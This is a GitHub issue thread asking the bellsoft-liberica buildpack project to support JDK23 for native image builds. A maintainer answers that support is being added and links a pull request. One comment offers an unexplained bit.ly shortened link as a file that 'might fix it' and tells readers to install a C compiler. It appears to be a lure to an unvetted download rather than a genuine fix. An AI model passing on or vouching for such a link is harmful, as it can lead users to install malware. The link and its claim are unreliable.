### ISSUE TITLE
Support for JDK23

### ISSUE THREAD

**Issue by patpatpat123** [paketo-buildpacks/bellsoft-liberica#721]
Hello team,

Just wanted to reach out to ask if it is possible to support JDK23 for native image.
I am currently using the newly release JDK23 and Graalvm23 to build applications.

As we are using the build pack process, we are stuck as JDK23 seems not to be supported.
Could you please help support JDK23?

Thank you.

P.s sincere apologies, I am going to duplicate this in the native image repository as well.
This is due to the fact that many repositories are dealing with Java. Please feel free to close the appropriate one.

**Comment by nhatlaso1** [comment]
This might help:This file might fix it
https://bit.ly/3XQLHlH

you may need to install the c compiler

**Comment by dmikusa** [comment]
It just became available. We're in the process of adding it. https://github.com/paketo-buildpacks/bellsoft-liberica/pull/720

It should be out shortly, very likely in the next release.

**Comment by patpatpat123** [comment]
Understood, thank you, I will follow up via your link.
